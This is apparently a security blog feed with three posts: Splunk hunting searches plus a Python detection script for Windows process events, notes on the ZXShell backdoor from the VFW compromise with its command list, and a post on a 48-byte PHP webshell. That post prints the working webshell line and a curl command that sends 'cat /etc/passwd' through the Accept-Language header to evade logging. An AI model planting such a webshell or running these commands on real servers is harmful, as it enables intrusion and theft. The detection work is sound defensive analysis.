<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Or you could alert on the execution of “at.exe”:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">index=main (EventID=4688 OR EventID=592) BaseFileName="at.exe"</span></div>
<b style="font-weight: normal;"><br /></b><br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">Malicious Microsoft Office Documents</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Word documents carrying malicious macros that download and execute malware are still common. WLS logs the creator process name, so it is simple to search for any event where Microsoft Word creates a new process:</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">index=main (EventID=4688 OR EventID=592) CreatorProcessName=WINWORD </span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">For Excel, PowerPoint or Access substitute the appropriate CreatorProcessName (EXCEL, POWERPNT and MSACCESS respectively).</span></div>
<b style="font-weight: normal;"><br /></b><br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">Entropy</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Attackers often use packed or encrypted binaries, and those have high entropy. This is not a candidate for an alert on its own, but it is useful for malware hunting. WLS reports the value for each executable, for example </span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Entropy="4.61108706992542"</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">. The scale is Shannon entropy in bits per byte, so 8 is the maximum; most unpacked executables fall well below 7, while packed or encrypted payloads approach it or exceed it. In Splunk you could search for unsigned binaries executed with entropy of 7 or above (expect legitimate unsigned installers and self-extracting archives to show up too, which is why this is a hunt rather than an alert):</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">index=main (EventID=4688 OR EventID=592) Signed=False Entropy>=7</span></div>
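<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">To show how the searches in this post behave as detection logic (the w3wp child processes, the svchost.exe parent check, rar "a -hp" and makecab.exe staging, at jobs, Office child processes, and unsigned high-entropy binaries), here is an added Python example that is not part of the post or of WLS. It parses constructed WLS-style key="value" lines modelled on the snippets above and runs every rule over each one. The sample events, the rule names, the svchost parent allowlist, the list of suspicious w3wp children and the entropy threshold of 7 are assumptions made for the example.</div>

```python
import re

# Constructed WLS-style events modelled on the snippets in this post (not captured
# from a real host). The index comments are referenced by the usage below.
SAMPLE_EVENTS = [
    # 0: IIS worker process spawning cmd.exe (webshell pattern)
    'BaseFileName="cmd.exe", CreatorProcessName="w3wp", EventID="4688", '
    'NewProcessName="C:\\Windows\\System32\\cmd.exe", SubjectUserName="DefaultAppPool", Signed="True", Entropy="4.9"',
    # 1: svchost.exe started by something other than services.exe
    'BaseFileName="svchost.exe", CreatorProcessName="mspswls.tmp", EventID="4688", Signed="True", Entropy="5.2"',
    # 2: the normal case, started by services.exe
    'BaseFileName="svchost.exe", CreatorProcessName="services.exe", EventID="4688", Signed="True", Entropy="5.2"',
    # 3: rar-style staging into an encrypted archive (CommandMonitor event)
    'LogType="WLS", Command="a.exe a -hpqwerty123 data1.rar supersecret.doc", ProcessName="cmd", User="WIN-1UJAK6S06VK\\testuser"',
    # 4: at job (CommandMonitor event)
    'LogType="WLS", Command="at 23:00 c:\\temp\\b.exe", ProcessName="cmd", User="WIN-1UJAK6S06VK\\testuser"',
    # 5: Word spawning a child process
    'BaseFileName="powershell.exe", CreatorProcessName="WINWORD", EventID="4688", Signed="True", Entropy="5.4"',
    # 6: unsigned binary with packer-level entropy
    'BaseFileName="upd.exe", CreatorProcessName="explorer", EventID="592", Signed="False", Entropy="7.43"',
    # 7: benign process start
    'BaseFileName="notepad.exe", CreatorProcessName="explorer", EventID="4688", Signed="True", Entropy="5.0"',
]

KV_RE = re.compile(r'(\w+)="([^"]*)"')
PROCESS_CREATE_IDS = {"4688", "592"}        # process creation on Vista+ / 2003
WEBSHELL_CHILDREN = {"cmd", "whoami", "netstat", "net", "net1", "powershell"}  # assumption
SVCHOST_PARENTS = {"services"}               # assumption: extend after baselining your builds
OFFICE_PARENTS = {"winword", "excel", "powerpnt", "msaccess"}
ARCHIVERS = {"makecab"}
PACKED_ENTROPY = 7.0                         # Shannon entropy, bits per byte (max 8)


def parse_wls(line):
    """Parse one WLS key="value" event into a dict (values are not escaped in WLS output)."""
    return dict(KV_RE.findall(line))


def proc_name(value):
    """Lower-case, drop any path and a trailing .exe, so 'w3wp', 'W3WP.EXE' and a full
    path all compare equal; the WLS snippets show parents both with and without .exe."""
    name = value.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def rule_iis_webshell(ev):
    return (ev.get("EventID") in PROCESS_CREATE_IDS
            and proc_name(ev.get("CreatorProcessName", "")) == "w3wp"
            and proc_name(ev.get("BaseFileName", "")) in WEBSHELL_CHILDREN)


def rule_svchost_parent(ev):
    return (ev.get("EventID") in PROCESS_CREATE_IDS
            and proc_name(ev.get("BaseFileName", "")) == "svchost"
            and proc_name(ev.get("CreatorProcessName", "")) not in SVCHOST_PARENTS)


def rule_archive_staging(ev):
    """rar 'a -hp<password>' (headers and data encrypted) or makecab.exe as the image."""
    cmd = ev.get("Command", "")
    tokens = cmd.split()
    if re.search(r"(^|\s)a\s+-hp", cmd):
        return True
    return bool(tokens) and proc_name(tokens[0]) in ARCHIVERS


def rule_at_job(ev):
    tokens = ev.get("Command", "").split()
    return ((bool(tokens) and proc_name(tokens[0]) == "at")
            or proc_name(ev.get("BaseFileName", "")) == "at")


def rule_office_child(ev):
    return (ev.get("EventID") in PROCESS_CREATE_IDS
            and proc_name(ev.get("CreatorProcessName", "")) in OFFICE_PARENTS)


def rule_packed_unsigned(ev):
    try:
        entropy = float(ev.get("Entropy", ""))
    except ValueError:
        return False
    return ev.get("Signed", "").lower() == "false" and entropy >= PACKED_ENTROPY


RULES = [
    ("iis_webshell", rule_iis_webshell),
    ("svchost_parent", rule_svchost_parent),
    ("archive_staging", rule_archive_staging),
    ("at_job", rule_at_job),
    ("office_child", rule_office_child),
    ("packed_unsigned", rule_packed_unsigned),
]


def evaluate(ev):
    """Names of every rule the parsed event trips."""
    return [name for name, rule in RULES if rule(ev)]


def scan(lines):
    """(index, [rule names]) for each raw WLS line that trips at least one rule."""
    hits = []
    for i, line in enumerate(lines):
        names = evaluate(parse_wls(line))
        if names:
            hits.append((i, names))
    return hits


if __name__ == "__main__":
    for i, names in scan(SAMPLE_EVENTS):
        print(f"event {i}: {', '.join(names)}")
```

<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">Run it directly to print which rule each sample trips. The normalisation in proc_name is what keeps the svchost and w3wp rules working whether a given WLS build writes the parent as "w3wp" or "w3wp.exe", and the same normalisation is the first thing to check when one of the Splunk searches above returns nothing.</div>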
<b style="font-weight: normal;"><br /></b><br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">I will be updating this post with additional searches when time allows. Hopefully this information is helpful, if you have any questions or comments hit me up on twitter.</span></div>
<br />Review of ZXShell Used in US Veterans of Foreign Wars Compromise (posted 2014-02-18)<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="color: black; font-family: Calibri; font-size: 13.5pt; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;">FireEye recently <a href="http://www.fireeye.com/blog/technical/cyber-exploits/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html">posted a blog article</a> on the compromise of the US Veterans of Foreign Wars website, and <a href="http://www.symantec.com/connect/blogs/new-internet-explorer-10-zero-day-discovered-watering-hole-attack" target="_blank">Symantec also has one</a>. I've played with ZXShell in the past and was curious if I could get the </span><span style="font-family: Calibri; font-size: 13.5pt;">DeputyDog/</span><span style="font-family: Calibri; font-size: medium;">Hidden Lynx</span><span style="font-family: Calibri; font-size: 13.5pt;"> actors'</span><span style="font-family: Calibri; font-size: 13.5pt;"> ZXShell payload working with my command and control server</span><span style="font-family: Calibri; font-size: medium;">. It turns out you can, and I was able to make some interesting comparisons between the client I tested and the <a href="https://www.virustotal.com/en/file/3d362ba0c4bc06b69a3a908bc62a50a2a673c10060f4b9268b8641536b43c5ac/analysis/" target="_blank">vfw dropper</a>.</span></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="color: black; font-family: Calibri; font-size: 13.5pt; mso-ascii-theme-font: major-latin; mso-hansi-theme-font: major-latin;"><br /></span></div>
<div style="margin-bottom: .0001pt; margin: 0in;">
<span style="font-family: Calibri; font-size: medium;">The agent below is the <a href="http://www.xfocus.net/tools/200706/1248.html" target="_blank">publicly available client</a> and the options available to run on the compromised host (translated descriptions are at the end of this blog).</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-_ikXYW3X3uQ/UwQRwcwNUhI/AAAAAAAAFek/sdjyML6xt_4/s1600/zxshell+commands+3.10.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-_ikXYW3X3uQ/UwQRwcwNUhI/AAAAAAAAFek/sdjyML6xt_4/s1600/zxshell+commands+3.10.tiff" height="348" width="640" /></a></div>
<br />
<!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="276">
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]-->
<span style="font-family: Calibri; font-size: medium;">This screenshot is the dropper used in the VFW.org attack connecting to my command and control server (I modified the hosts file and spoofed DNS replies with Mandiant's ApateDNS).</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-eSA250JaLIQ/UwQSzsD-dgI/AAAAAAAAFes/E-knButJElw/s1600/ZXShell+3.20+commands.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-eSA250JaLIQ/UwQSzsD-dgI/AAAAAAAAFes/E-knButJElw/s1600/ZXShell+3.20+commands.tiff" height="238" width="640" /></a></div>
<span style="font-family: Calibri; font-size: medium;"><br /></span>
<span style="font-family: Calibri; font-size: medium;">The first thing I noticed was the lack of commands, despite this being a newer version (assuming 3.10 and 3.20 are client versions). Also, the descriptions have all been changed to English, which is a bit odd if English isn't your first language. Speaking of odd, I was wondering about this:</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-UUsIbI-vNMU/UwQU_nEkuFI/AAAAAAAAFe4/sKPodkH1QGY/s1600/ns1.china.com.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-UUsIbI-vNMU/UwQU_nEkuFI/AAAAAAAAFe4/sKPodkH1QGY/s1600/ns1.china.com.jpg" /></a></div>
<span style="font-family: Calibri; font-size: medium;">In general this is horrible OpSec, if you spend a few minutes looking at <a href="https://www.virustotal.com/en/file/3d362ba0c4bc06b69a3a908bc62a50a2a673c10060f4b9268b8641536b43c5ac/analysis/" target="_blank">it</a> you'll find many examples. Maybe just a case of being lazy or perhaps they were only testing something.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-kLEoRX7Xt64/UwQXC7U4TzI/AAAAAAAAFfE/gnXoQ1AuTWk/s1600/onlyatest.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-kLEoRX7Xt64/UwQXC7U4TzI/AAAAAAAAFfE/gnXoQ1AuTWk/s1600/onlyatest.tiff" height="199" width="320" /></a></div>
<span style="font-family: Calibri; font-size: medium;">Lots of strangeness with this one, but that makes it fun. There is still a lot to dig through, but I wanted to post some of my notes while it's fresh in my head. If you find anything interesting or something I missed, let me know.</span><br />
<span style="font-family: Calibri; font-size: medium;"><br /></span>
<span style="font-family: Calibri; font-size: medium;"><b>3.10 ZXShell Commands</b></span><br />
<pre>CA ==> cloning system account
CleanEvent -> Clear System Diary
CloseFW -> temporarily closed windows comes with a firewall
End -> end of the program
Execute ==> run a program
Time information FileTime ==> clone a file
FindPass -> Find a login account password x
FindDialPass -> lists all the dial-up account and password x
Help | -?> Display the information
KeyLog ==> remote computer to capture or record key information x
LoadDll ==> load a DLL or inserted into the specified process
PortScan ==> port scanning
Ps ==> Process Management
RunAs ==> to other processes or identity of the user running the program
SC ==> Service Management
ShareShell ==> Sharing a Shell to others.
ShutDown ==> Logout | | restart | | closed system
Sysinfo -> View System Details
SYNFlood -> SYN attacks x
TermSvc ==> Terminal Services Configuration
TransFile ==> from the specified URL to download files or upload files to a specified FTP server
Uninstall -> uninstall
User ==> Account Management System
ZXARPS ==> ZXARPS x
ZXFtpServer ==> FTP server x
ZXNC ==> NC
ZXHttpProxy ==> HTTP proxy server
ZXHttpServer ==> HTTP server
ZXPlug ==> plug-in function, you can add custom commands
ZXSockProxy ==> Socks 4 & 5 Proxy
The command completed successfully.
</pre>
<div>
<br /></div>
<span style="font-family: Calibri; font-size: medium;">From the attacker's perspective, here is the command shell. Do you have alerts/logging for cmd.exe running as SYSTEM? Check out <a href="http://energy.gov/sites/prod/files/cioprod/documents/Splunkified_-_the_Next_Evolution_of_Log_Analysis_-_Green_and_McCord.pdf" target="_blank">Windows Logging Service</a></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-SCy1qJUs9ro/UwQb88rpQJI/AAAAAAAAFfU/amjeL_HS4bA/s1600/zx+dos+prompt+system.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-SCy1qJUs9ro/UwQb88rpQJI/AAAAAAAAFfU/amjeL_HS4bA/s1600/zx+dos+prompt+system.tiff" height="307" width="640" /></a></div>
<span style="font-family: Calibri; font-size: medium;"><br /></span>
<span style="font-family: Calibri; font-size: medium;">And also running VNC from the C2 server:</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-2XnW0alnXOo/UwQcwBbBMAI/AAAAAAAAFfc/qHkHWgBC8eE/s1600/zx+shell+remote+desktop.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-2XnW0alnXOo/UwQcwBbBMAI/AAAAAAAAFfc/qHkHWgBC8eE/s1600/zx+shell+remote+desktop.tiff" height="283" width="400" /></a></div>
<span style="font-family: Calibri; font-size: medium;"><br /></span>
<span style="font-family: Calibri; font-size: medium;">Dropper calling home to the command and control server (the pcap is from the VFW dropper):</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-a2deglh4DPE/UwQd90yMS1I/AAAAAAAAFfo/79Nri1uLKoE/s1600/callinghome.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-a2deglh4DPE/UwQd90yMS1I/AAAAAAAAFfo/79Nri1uLKoE/s1600/callinghome.tiff" /></a></div>
<span style="font-family: Calibri; font-size: medium;"><br /></span>
<span style="font-family: Calibri; font-size: medium;">Happy hunting.</span><br />
<br />Unknown noreply@blogger.com
tag:blogger.com,1999:blog-2139855789243746740.post-5508341611786959646 2013-09-02T05:07:00.000-07:00 2013-09-02T06:04:04.417-07:00
GET your Webshell While Evading Detection<span style="font-family: Arial, Helvetica, sans-serif;">Recently I came across a webshell that was a bit different from the others. Besides being only 48 bytes, it uses the 'Accept-Language' HTTP header field to accept remote commands. The webshell on the server would only need to contain: </span><span style="background-color: #b6d7a8; font-family: Times, 'Times New Roman', serif; text-align: center;"><?php passthru(getenv("HTTP_ACCEPT_LANGUAGE"))?></span><br />
<span style="background-color: #b6d7a8; font-family: Times, 'Times New Roman', serif; text-align: center;"><br /></span>
<br />
<div style="text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">There are a few benefits to this from the attacker's perspective. The main benefit is that it uses HTTP GET: the command travels in a header that the default access log does not record, so the request looks like any other page view and anomalies are quite difficult to find in the HTTP logs, even with Splunk (unless the attacker calls the file webshell.php). I would bet most people are on the lookout for HTTP POSTs to a new file rather than HTTP GETs. With Splunk you can monitor and alert on HTTP POST deviations, but with GET it seems that strategy won't cut it. </span></div>
<div style="text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Using curl we GET 48bytes.php and add the Accept-Language header, followed by the shell command 'cat /etc/passwd'. Additionally I added -A to use a less conspicuous user agent.</span></div>
<div style="text-align: left;">
<span style="background-color: #b6d7a8; font-family: Times, Times New Roman, serif;">curl -H "Accept-Language: cat /etc/passwd" -A "Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:72.0) Gecko/20132121 Firefox/19.0" http://192.168.110.114/webshells/48bytes.php</span></div>
<div style="text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;">When requesting the webshell, the Apache logs will show (standard CentOS 6 install):</span><br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<span style="background-color: #b6d7a8;"> [01/Sep/2013:13:02:37 -0700] "GET /webshells/48bytes.php HTTP/1.1" 200 1973 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:23.0) Gecko/20100101 Firefox/23.0"</span><br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">The response from the web server, as you would expect, looks like this:</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-ta8lHVM9FKA/UiOpDY2S5VI/AAAAAAAAFB8/hH0ZaVZuAt8/s1600/webshell_response.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="403" src="http://2.bp.blogspot.com/-ta8lHVM9FKA/UiOpDY2S5VI/AAAAAAAAFB8/hH0ZaVZuAt8/s640/webshell_response.png" width="640" /></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<span style="font-family: Arial, Helvetica, sans-serif;">Running tcpdump we can see the following traffic flow:</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-v8eRYsVbOdE/UiOrQbHRsgI/AAAAAAAAFCI/W9SlvThQk4k/s1600/wire.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="64" src="http://3.bp.blogspot.com/-v8eRYsVbOdE/UiOrQbHRsgI/AAAAAAAAFCI/W9SlvThQk4k/s640/wire.tiff" width="640" /></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Following the TCP stream in Wireshark gives us this view (notice the Accept-Language: cat /etc/passwd):</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-gdnl9zhGc6c/UiOpCjEW8qI/AAAAAAAAFB0/XJtqpqex470/s1600/FollowTCPStream.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="http://3.bp.blogspot.com/-gdnl9zhGc6c/UiOpCjEW8qI/AAAAAAAAFB0/XJtqpqex470/s640/FollowTCPStream.tiff" width="566" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<h3>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;">So how do the good guys detect this?</span></h3>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">I was hoping that <a href="http://bro.org/" target="_blank">Bro Network Security Monitor</a> would help; however, by default it doesn't log the Accept-Language string (it logs which headers are used). Even if the majority of sites in your enterprise use TLS, it's probably not a bad idea to enable the collection of header data for your web servers. If you're sending the Bro logs to Splunk (with header data) you can create an alert to fire on keywords, length, etc.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Bro_http log of 'cat /etc/passwd' via webshell:</span></div>
<div>
<pre>1378069940.789597	SvWL0TLDOB3	192.168.110.129	58148	192.168.110.114	80	0	-	-	-	-	-	0	1973	200	OK	-	-	-	(empty)	-	HOST,USER-AGENT,ACCEPT,ACCEPT-LANGUAGE,ACCEPT-ENCODING,REFERER,CONNECTION	HOST,USER-AGENT,ACCEPT,ACCEPT-LANGUAGE,ACCEPT-ENCODING,REFERER,CONNECTION</pre></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Using Snort has the same drawback of missing out on TLS connections. If you are using a proxy and have a tap into the unencrypted traffic, this would be an ideal solution (along with using Bro). </span><br />
